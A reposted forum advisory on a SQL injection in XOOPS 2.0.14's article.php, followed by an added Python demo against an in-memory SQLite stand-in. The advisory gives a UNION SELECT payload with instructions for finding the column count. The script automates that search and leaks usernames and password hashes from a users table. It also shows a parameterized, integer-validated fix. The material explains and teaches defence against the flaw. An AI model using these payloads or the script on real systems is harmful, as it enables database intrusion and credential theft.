[Repost] XOOPS 2.0.14 (article.php) SQL Injection Vulnerability

Posted on: 2010-8-29 14:17
#
# [2]-SQL injection
#
# Vulnerability Description:
# SQL injection is a code injection technique that exploits a security vulnerability in the database layer of an application. The vulnerability is present when user input is either not correctly filtered for string-literal escape characters embedded in SQL statements, or is not strongly typed (here, a numeric id that is never checked to be a number), so that attacker-supplied text is executed as part of the query.
#
# Affected items:
# article.php (the affected URL is link-encoded in the forum repost and is not recoverable) [SQL Injection]
#
# Example: -1337+uNiOn+sElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- [grow or shrink the numbered list until the UNION stops failing; the length that works is the column count of the vulnerable query, and any of those positions can then be replaced by a real column name]
# Demo: (the demo URL is link-encoded in the forum repost and is not recoverable)
#
# The Risk:
# By exploiting this vulnerability, an attacker can inject arbitrary SQL into the query the script builds and read data from the database, including tables the script was never meant to expose.
#
# Fix the vulnerability:
# To protect against SQL injection, user input must never be embedded directly in SQL statements. Use parameterized (prepared) statements instead (preferred), and for a numeric id additionally validate that the value is an integer before it reaches the query; escaping or filtering the input is a weaker fallback.
#
#################################################################
#################################################################
# r00tDefaced.com [28/08/2010]
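The column-count discovery from the Example line and the parameterized fix from the Fix section, worked through as an added Python example against an in-memory SQLite stand-in. This is not XOOPS code and not the advisory author's script: the `articles`/`users` schema, the rows in it, and every function name are constructed for the demonstration, and the vulnerable query simply mirrors the pattern the advisory describes (an unchecked id concatenated into the SQL text).

```python
import re
import sqlite3

# Constructed stand-in schema; the real XOOPS tables are not reproduced here.
SCHEMA = """
CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
CREATE TABLE users (uid INTEGER PRIMARY KEY, uname TEXT, pass TEXT);
INSERT INTO articles VALUES (1, 'Hello', 'First article');
INSERT INTO users VALUES (1, 'admin', 'hash-of-admin-password');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_article_vulnerable(conn, article_id):
    # The flaw the advisory describes: the request parameter is pasted into
    # the SQL text, so whatever follows the number becomes part of the query.
    sql = "SELECT id, title, body FROM articles WHERE id=" + article_id
    return conn.execute(sql).fetchall()


def fetch_article_fixed(conn, article_id):
    # Hardened form: strict integer validation, then a bound parameter.
    # A UNION payload never reaches the database as SQL.
    if not re.fullmatch(r"-?\d+", article_id):
        raise ValueError("article id must be an integer")
    sql = "SELECT id, title, body FROM articles WHERE id=?"
    return conn.execute(sql, (int(article_id),)).fetchall()


def find_column_count(conn, max_cols=20):
    # Automates the advisory's "find the number of columns" step: append
    # UNION SELECT 1..n and grow n until the database stops rejecting the
    # statement for a column-count mismatch. -1337 selects no real row, so
    # only the injected row comes back.
    for n in range(1, max_cols + 1):
        marker_list = ",".join(str(i) for i in range(1, n + 1))
        payload = "-1337 UNION SELECT " + marker_list + "-- "
        try:
            fetch_article_vulnerable(conn, payload)
        except sqlite3.DatabaseError:
            continue  # wrong column count (or other SQL error); try one more
        return n
    return None


def dump_users_vulnerable(conn, ncols):
    # With the column count known, the attacker replaces the numeric
    # markers with real columns from another table.
    if ncols < 2:
        raise ValueError("need at least two columns for this payload")
    cols = ["uname", "pass"] + [str(i) for i in range(3, ncols + 1)]
    payload = "-1337 UNION SELECT " + ",".join(cols) + " FROM users-- "
    return fetch_article_vulnerable(conn, payload)


if __name__ == "__main__":
    db = open_db()
    n = find_column_count(db)
    print("column count of vulnerable query:", n)
    print("rows leaked through UNION:", dump_users_vulnerable(db, n))
    print("fixed query, legitimate id:", fetch_article_fixed(db, "1"))
    try:
        fetch_article_fixed(db, "-1337 UNION SELECT 1,2,3-- ")
    except ValueError as exc:
        print("fixed query, payload rejected:", exc)
```

SQLite reports the mismatch as "SELECTs to the left and right of UNION do not have the same number of result columns"; MySQL, which XOOPS runs on, reports "The used SELECT statements have a different number of columns", so the same loop works there with a MySQL driver. The fixed function rejects the payload on validation alone; even without that check, binding `id` as a parameter would keep the input from being parsed as SQL.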